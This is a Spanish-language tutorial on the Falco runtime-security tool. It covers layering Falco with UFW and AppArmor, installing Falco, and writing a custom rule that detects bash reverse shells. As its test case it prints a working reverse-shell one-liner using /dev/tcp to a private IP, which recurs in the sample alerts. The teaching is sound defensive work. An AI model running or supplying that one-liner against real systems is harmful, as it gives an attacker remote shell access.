🛡️ ¿Bloquea Falco?
❌ No bloquea por sí solo ✔ Detecta con precisión quirúrgica
Pero puedes reaccionar automáticamente:
Ejecutar script → kill -9 %proc.pid
Deshabilitar red
Bloquear IP en UFW
Enviar alerta a Telegram / Slack / Zabbix
🔗 Falco + UFW + AppArmor (triple defensa) Capa Función UFW Bloquea tráfico AppArmor Restringe procesos Falco Detecta comportamiento
👉 Esto es EDR artesanal en Linux
# Cuando ejecutas:
bash -i >& /dev/tcp/192.168.100.5/443 0>&1
# Falco genera 💥 En tiempo real, antes de que puedas escribir whoami.:
CRITICAL 🚨 Reverse shell detectada!
Proceso=bash
Comando=bash -i >& /dev/tcp/192.168.100.5/443 0>&1
Destino=192.168.100.5:443
🔗 Falco + UFW + AppArmor (triple defensa)
| Capa | Función |
|---|---|
| UFW | Bloquea tráfico |
| AppArmor | Restringe procesos |
| Falco | Detecta comportamiento |
https://falco.org/docs/setup/download/
wget https://download.falco.org/packages/deb/stable/falco-0.42.0-x86_64.deb
sudo gdebi falco-0.42.0-x86_64.deb
Las reglas de Falco se encuentran en `/etc/falco/falco.yaml `
y las reglas personalizadas en `/etc/falco/rules.d/.`
Regla para bloquear reverse shell
- rule: Shellshock Reverse Shell
desc: Detects reverse shell attempts using bash
condition: >
proc.name in (bash, sh) and proc.args contains "bash" and
proc.args contains "i" and proc.args contains "/dev/tcp"
output: >
Reverse shell attempt detected: %proc.cmdline
priority: CRITICAL
sudo systemctl restart falco # reiniciar falco
Verás alertas como las siguientes si alguien intenta ejecutar un reverse shell:
[Alert] Reverse shell attempt detected: bash -i >& /dev/tcp/192.168.100.5/443 0>&1